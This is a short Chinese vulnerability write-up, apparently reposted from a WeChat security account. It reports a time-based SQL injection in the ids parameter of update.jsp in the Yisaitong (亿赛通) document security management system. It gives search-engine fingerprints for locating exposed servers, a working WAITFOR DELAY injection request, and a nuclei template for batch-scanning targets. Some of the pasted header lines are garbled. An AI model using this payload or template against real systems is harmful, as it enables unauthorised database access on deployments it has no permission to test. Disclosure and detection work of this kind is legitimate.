0x01免责声明
技术文章仅供参考学习,请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。
0x02 影响版本
亿赛通 电子文档安全管理系统
指纹信息:
app=”亿赛通-电子文档安全管理系统”
web.body=”CDGServer3″
0x03 漏洞分析
漏洞位于CDGServer3/workflowE/useractivate/update.jsp处的ids参数,看代码可以发现从请求中传入两个参数一个是ids和flag,往下走可以看到一个判断检查ids是否不为空且长度大于0,如果ids不等于空的话就会用逗号,分隔为一个数组。在往下走就是拼接ids参数了,可以看到没有预编译也没有充足的校验所以是存在SQL注入的。
0x04 漏洞复现
这个延迟注入很奇怪他执行sleep(1)实际上是延迟了5秒,感觉像是ids注入的参数在系统后台多次使用导致延迟时间变久。
GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:3%27-- HTTP/1.1Host: xxxxxxCache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
为了方便漏洞批量检测写了一个nuclei插件如下:
id: yisaitong-update-sqlinfo:name: yisaitong-update-sqlauthor: Kokoxcaseverity: criticaldescription: yisaitong-update-sqlreference:https://tags: yisaitongrequests:raw:|-GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:1%27-- HTTP/1.1Host: {{Hostname}}Pragma: no-cache: no-cache: 1: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: gzip, deflate: zh-CN,zh;q=0.9Connection: closematchers:type: dsldsl:"status_code_1 == 200 && duration>=3 && duration<=8 && contains(body,'激活') && contains(header,'html')"
原文始发于微信公众号(Kokoxca安全):亿赛通文档安全管理系统SQL注入复现
